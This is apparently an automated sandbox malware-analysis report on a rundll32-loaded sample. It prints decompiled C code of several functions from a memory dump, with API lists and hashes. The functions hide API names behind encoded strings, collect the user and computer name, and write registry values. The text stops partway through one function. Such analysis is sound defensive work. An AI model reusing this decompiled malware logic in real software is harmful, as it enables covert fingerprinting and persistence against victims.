                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: b556888951cfa645474de61e5523970bb024dc7df7191f4b588a2c59c0f51602
                                                  • Instruction ID: 94ec17db9b34bfe70164c7c0d0708739e0c6a9495e1f459951632dd2b80deae0
                                                  • Opcode Fuzzy Hash: b556888951cfa645474de61e5523970bb024dc7df7191f4b588a2c59c0f51602
                                                  • Instruction Fuzzy Hash: C8314E32D00609ABDF11DFBDC844A9EBBB6EF49305F144465E911EB120DB75AD0ACB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B3692C, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E04B3692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04B32049(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x4b3d27c; // 0x1fba5a8
					_t1 = _t23 + 0x4b3e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x4b3d27c; // 0x1fba5a8
					_t2 = _t26 + 0x4b3e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04B39039(_t54);
					} else {
						_t30 =  *0x4b3d27c; // 0x1fba5a8
						_t5 = _t30 + 0x4b3e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x4b3d27c; // 0x1fba5a8
							_t7 = _t33 + 0x4b3e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x4b3d27c; // 0x1fba5a8
								_t9 = _t36 + 0x4b3e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x4b3d27c; // 0x1fba5a8
									_t11 = _t39 + 0x4b3e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04B3727B(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                  0x04b3693b
                                                  0x04b3693f
                                                  0x04b36a01
                                                  0x04b36945
                                                  0x04b36945
                                                  0x04b3694a
                                                  0x04b3695d
                                                  0x04b3695f
                                                  0x04b36964
                                                  0x04b3696c
                                                  0x04b36973
                                                  0x04b36977
                                                  0x04b3697a
                                                  0x04b369f9
                                                  0x04b369fa
                                                  0x04b3697c
                                                  0x04b3697c
                                                  0x04b36981
                                                  0x04b36989
                                                  0x04b3698d
                                                  0x04b36990
                                                  0x00000000
                                                  0x04b36992
                                                  0x04b36992
                                                  0x04b36997
                                                  0x04b3699f
                                                  0x04b369a3
                                                  0x04b369a6
                                                  0x00000000
                                                  0x04b369a8
                                                  0x04b369a8
                                                  0x04b369ad
                                                  0x04b369b5
                                                  0x04b369b9
                                                  0x04b369bc
                                                  0x00000000
                                                  0x04b369be
                                                  0x04b369be
                                                  0x04b369c3
                                                  0x04b369cb
                                                  0x04b369cf
                                                  0x04b369d2
                                                  0x00000000
                                                  0x04b369d4
                                                  0x04b369da
                                                  0x04b369df
                                                  0x04b369e6
                                                  0x04b369ed
                                                  0x04b369f0
                                                  0x00000000
                                                  0x04b369f2
                                                  0x04b369f5
                                                  0x04b369f5
                                                  0x04b369f0
                                                  0x04b369d2
                                                  0x04b369bc
                                                  0x04b369a6
                                                  0x04b36990
                                                  0x04b3697a
                                                  0x04b36a0f

                                                  APIs
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04B3207A,?,00000001,?,?,00000000,00000000), ref: 04B36951
                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04B36973
                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04B36989
                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04B3699F
                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04B369B5
                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04B369CB
                                                    • Part of subcall function 04B3727B: memset.NTDLL ref: 04B372FA
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                  • String ID:
                                                  • API String ID: 1886625739-0
                                                  • Opcode ID: 915af75dd84168d8fe817d780856de78f175c0642ca846d9702686c554cec5c3
                                                  • Instruction ID: e80f167206ea8c1759d0ac17cfd2b10c737b3e1e094df53c3ae3968070c087f4
                                                  • Opcode Fuzzy Hash: 915af75dd84168d8fe817d780856de78f175c0642ca846d9702686c554cec5c3
                                                  • Instruction Fuzzy Hash: C2212DB560120AEFEB20DFBBDC44E5A77ECEB18346B02816AE645D7201E734E9058F70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B37649, Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E04B37649() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E04B32049(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E04B39039(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4b3a33a
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                                                  0x04b37657
                                                  0x04b3765a
                                                  0x04b3765d
                                                  0x04b37663
                                                  0x04b37668
                                                  0x04b3766e
                                                  0x04b37676
                                                  0x04b37679
                                                  0x04b3767f
                                                  0x04b37684
                                                  0x04b37691
                                                  0x04b3769e
                                                  0x04b376a2
                                                  0x04b376a4
                                                  0x04b376a8
                                                  0x04b376ab
                                                  0x04b376bb
                                                  0x04b3770d
                                                  0x04b3770e
                                                  0x04b376bd
                                                  0x04b376c0
                                                  0x04b376c7
                                                  0x04b376ca
                                                  0x04b376dd
                                                  0x00000000
                                                  0x04b376df
                                                  0x04b376e2
                                                  0x04b376e7
                                                  0x04b376f5
                                                  0x04b376f8
                                                  0x04b37700
                                                  0x04b37703
                                                  0x00000000
                                                  0x04b37705
                                                  0x04b37705
                                                  0x04b37708
                                                  0x04b37708
                                                  0x04b37703
                                                  0x04b376dd
                                                  0x04b37713
                                                  0x04b37714
                                                  0x04b37684
                                                  0x04b3771a

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,04B3A338), ref: 04B3765D
                                                  • GetComputerNameW.KERNEL32(00000000,04B3A338), ref: 04B37679
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • GetUserNameW.ADVAPI32(00000000,04B3A338), ref: 04B376B3
                                                  • GetComputerNameW.KERNEL32(04B3A338,?), ref: 04B376D5
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04B3A338,00000000,04B3A33A,00000000,00000000,?,?,04B3A338), ref: 04B376F8
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                  • String ID:
                                                  • API String ID: 3850880919-0
                                                  • Opcode ID: 98128bcc13c53a0962b3320581ce83c1c4ffada82d0c4081394f1bc7e6d46878
                                                  • Instruction ID: 4ef1ff11a7cbb6647447a1471709f226bf05c95674d7740ae7a9f822bb51ccc1
                                                  • Opcode Fuzzy Hash: 98128bcc13c53a0962b3320581ce83c1c4ffada82d0c4081394f1bc7e6d46878
                                                  • Instruction Fuzzy Hash: 5121BDB6910209FBDB11DFE6D984CEEBBBCEE44345B5084AAE501E7241DB34AF44DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B31585, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E04B31585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04B37F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E04B3A9AB(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x4b3d130() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                  0x04b31585
                                                  0x04b31592
                                                  0x04b31594
                                                  0x04b315f7
                                                  0x00000000
                                                  0x04b315f7
                                                  0x04b315ac
                                                  0x04b315b3
                                                  0x04b315bf
                                                  0x04b315c4
                                                  0x04b315c6
                                                  0x04b315c8
                                                  0x04b315ca
                                                  0x04b315cc
                                                  0x04b315ce
                                                  0x04b315da
                                                  0x04b315ea
                                                  0x00000000
                                                  0x04b315dc
                                                  0x04b315dc
                                                  0x04b315e3
                                                  0x04b315f0
                                                  0x04b315f0
                                                  0x04b315f0
                                                  0x04b315e3
                                                  0x04b315da
                                                  0x04b315f5
                                                  0x00000000
                                                  0x00000000
                                                  0x04b315fb

                                                  APIs
                                                  • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04B311DA,?,?,00000000,00000000), ref: 04B315BF
                                                  • ResetEvent.KERNEL32(?), ref: 04B315C4
                                                  • GetLastError.KERNEL32 ref: 04B315DC
                                                  • GetLastError.KERNEL32(?,?,00000102,04B311DA,?,?,00000000,00000000), ref: 04B315F7
                                                    • Part of subcall function 04B37F27: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04B315A4,?,?,?,?,00000102,04B311DA,?,?,00000000), ref: 04B37F33
                                                    • Part of subcall function 04B37F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04B315A4,?,?,?,?,00000102,04B311DA,?), ref: 04B37F91
                                                    • Part of subcall function 04B37F27: lstrcpy.KERNEL32(00000000,00000000), ref: 04B37FA1
                                                  • SetEvent.KERNEL32(?), ref: 04B315EA
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1449191863-0
                                                  • Opcode ID: 80f10b700e03918efe16ca4afc15d1410a418988c97075ccdfea7a99b7dd9c8f
                                                  • Instruction ID: ddfe6b589035a1b801d9303f4520be5f0590c234cd1461dcf2a2be55d6783fa3
                                                  • Opcode Fuzzy Hash: 80f10b700e03918efe16ca4afc15d1410a418988c97075ccdfea7a99b7dd9c8f
                                                  • Instruction Fuzzy Hash: 6A016272100651ABD7316F77DC44B1B7ABCFF44366F214A66F552A20E0DA30F8159621
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B38F10, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E04B38F10(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x4b3d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x4b3d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x4b3d258 = _t6;
					 *0x4b3d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x4b3d254 = _t7;
					if(_t7 == 0) {
						 *0x4b3d254 =  *0x4b3d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                                                  0x04b38f18
                                                  0x04b38f20
                                                  0x04b38f25
                                                  0x00000000
                                                  0x04b38f7a
                                                  0x04b38f27
                                                  0x04b38f2f
                                                  0x04b38f37
                                                  0x04b38f37
                                                  0x04b38f77
                                                  0x00000000
                                                  0x04b38f77
                                                  0x04b38f39
                                                  0x04b38f39
                                                  0x04b38f3e
                                                  0x04b38f50
                                                  0x04b38f55
                                                  0x04b38f5b
                                                  0x04b38f63
                                                  0x04b38f68
                                                  0x04b38f6a
                                                  0x04b38f6a
                                                  0x00000000
                                                  0x04b38f71
                                                  0x04b38f33
                                                  0x00000000
                                                  0x00000000
                                                  0x04b38f35
                                                  0x00000000

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04B36A90,?,?,00000001,?,?,?,04B3807D,?), ref: 04B38F18
                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,04B3807D,?), ref: 04B38F27
                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04B3807D,?), ref: 04B38F3E
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04B3807D,?), ref: 04B38F5B
                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,04B3807D,?), ref: 04B38F7A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                  • String ID:
                                                  • API String ID: 2270775618-0
                                                  • Opcode ID: 53d1083f6458bb6a3d2dd1b9f13651684070856b56726793167121095a0852ef
                                                  • Instruction ID: b9ed871130bc68401ff4f18bc7d69d830c7449cd0c0cb2d010358284cbfcc5a2
                                                  • Opcode Fuzzy Hash: 53d1083f6458bb6a3d2dd1b9f13651684070856b56726793167121095a0852ef
                                                  • Instruction Fuzzy Hash: 60F01971684341AAEB20AF77AD09B1C7BB6E744783F00495BF542DB1C0D6B8A841CA3A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B317D5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E04B317D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0x4b3d33c);
					_t97 = 0x80000002;
					L6:
					_t60 = E04B3809F(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					if(E04B388B7(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E04B39039(_a8);
						goto L29;
					}
					_t65 =  *0x4b3d27c; // 0x1fba5a8
					_t16 = _t65 + 0x4b3e8fe; // 0x65696c43
					_t68 = E04B3809F(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d04b3c0
						if(E04B3A635(_t103,  *_t33, _t97, _a8,  *0x4b3d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x4b3d27c; // 0x1fba5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0x4b3ea5f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x4b3e89f; // 0x55434b48
								_t73 = _t34;
							}
							if(E04B3816C(_t73,  *0x4b3d334,  *0x4b3d338,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0x4b3d27c; // 0x1fba5a8
									_t44 = _t75 + 0x4b3e871; // 0x74666f53
									_t78 = E04B3809F(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d04b3c0
										E04B32659( *_t47, _t97, _a8,  *0x4b3d338, _a24);
										_t49 = _t107 + 0x10; // 0x3d04b3c0
										E04B32659( *_t49, _t97, _t105,  *0x4b3d330, _a16);
										E04B39039(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d04b3c0
									E04B32659( *_t40, _t97, _a8,  *0x4b3d338, _a24);
									_t43 = _t107 + 0x10; // 0x3d04b3c0
									E04B32659( *_t43, _t97, _a8,  *0x4b3d330, _a16);
								}
								if( *_t107 != 0) {
									E04B39039(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d04b3c0
					if(E04B36BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d04b3c0
							E04B3A635(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E04B39039(_t106);
						_t104 = _a16;
					}
					E04B39039(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E04B3A8D8(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0x4b3d33c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}























                                                  0x04b317d5
                                                  0x04b317de
                                                  0x04b317e5
                                                  0x04b317ea
                                                  0x04b31857
                                                  0x04b3185d
                                                  0x04b31862
                                                  0x04b3186b
                                                  0x04b31872
                                                  0x04b31875
                                                  0x04b319e9
                                                  0x04b319f0
                                                  0x04b319f0
                                                  0x04b319f5
                                                  0x04b319f7
                                                  0x04b319f7
                                                  0x04b31a00
                                                  0x04b31a00
                                                  0x04b3187b
                                                  0x04b31887
                                                  0x04b319df
                                                  0x04b319e2
                                                  0x00000000
                                                  0x04b319e2
                                                  0x04b3188d
                                                  0x04b31892
                                                  0x04b3189b
                                                  0x04b318a2
                                                  0x04b318a5
                                                  0x04b318ef
                                                  0x04b318ef
                                                  0x04b31902
                                                  0x04b3190c
                                                  0x04b31914
                                                  0x04b31919
                                                  0x04b31923
                                                  0x04b31923
                                                  0x04b3191b
                                                  0x04b3191b
                                                  0x04b3191b
                                                  0x04b3191b
                                                  0x04b31945
                                                  0x04b3194d
                                                  0x04b3197b
                                                  0x04b31980
                                                  0x04b31989
                                                  0x04b3198e
                                                  0x04b31992
                                                  0x04b319c4
                                                  0x04b31994
                                                  0x04b319a1
                                                  0x04b319a4
                                                  0x04b319b4
                                                  0x04b319b7
                                                  0x04b319bd
                                                  0x04b319bd
                                                  0x04b3194f
                                                  0x04b3195c
                                                  0x04b3195f
                                                  0x04b31971
                                                  0x04b31974
                                                  0x04b31974
                                                  0x04b319ce
                                                  0x04b319da
                                                  0x04b319d0
                                                  0x04b319d3
                                                  0x04b319d3
                                                  0x04b319ce
                                                  0x04b31945
                                                  0x00000000
                                                  0x04b3190c
                                                  0x04b318b4
                                                  0x04b318be
                                                  0x04b318c0
                                                  0x04b318c5
                                                  0x04b318c9
                                                  0x04b318cb
                                                  0x04b318d6
                                                  0x04b318d9
                                                  0x04b318d9
                                                  0x04b318df
                                                  0x04b318e4
                                                  0x04b318e4
                                                  0x04b318ea
                                                  0x00000000
                                                  0x04b318ea
                                                  0x04b317ef
                                                  0x00000000
                                                  0x04b31816
                                                  0x04b31816
                                                  0x04b31822
                                                  0x04b31835
                                                  0x04b3183b
                                                  0x04b31843
                                                  0x00000000
                                                  0x04b31843

                                                  APIs
                                                  • StrChrA.SHLWAPI(04B33C81,0000005F,00000000,00000000,00000104), ref: 04B31808
                                                  • lstrcpy.KERNEL32(?,?), ref: 04B31835
                                                    • Part of subcall function 04B3809F: lstrlen.KERNEL32(?,00000000,04B3D330,00000001,04B32200,04B3D00C,04B3D00C,00000000,00000005,00000000,00000000,?,?,?,04B396C1,04B323E9), ref: 04B380A8
                                                    • Part of subcall function 04B3809F: mbstowcs.NTDLL ref: 04B380CF
                                                    • Part of subcall function 04B3809F: memset.NTDLL ref: 04B380E1
                                                    • Part of subcall function 04B32659: lstrlenW.KERNEL32(04B33C81,?,?,04B319A9,3D04B3C0,80000002,04B33C81,04B38B1E,74666F53,4D4C4B48,04B38B1E,?,3D04B3C0,80000002,04B33C81,?), ref: 04B32679
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 04B31857
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                  • String ID: \
                                                  • API String ID: 3924217599-2967466578
                                                  • Opcode ID: acfd8abb034c9db0c58ca0f70ae8eb8b7343f45a7c53f41a131132354d0c6368
                                                  • Instruction ID: a46844e1257eac8d0552eb94b07ce51df0307b3f71bfc11f5a167a9fe05364fe
                                                  • Opcode Fuzzy Hash: acfd8abb034c9db0c58ca0f70ae8eb8b7343f45a7c53f41a131132354d0c6368
                                                  • Instruction Fuzzy Hash: 7D516C76100209EFDF11AFA6CC40E9A37BEEF1830AF008596FA5593120D735ED269B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B352F9, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 46%
                                                  			E04B352F9(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x4b3d27c; // 0x1fba5a8
					_t5 = _t102 + 0x4b3e038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x4b3c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
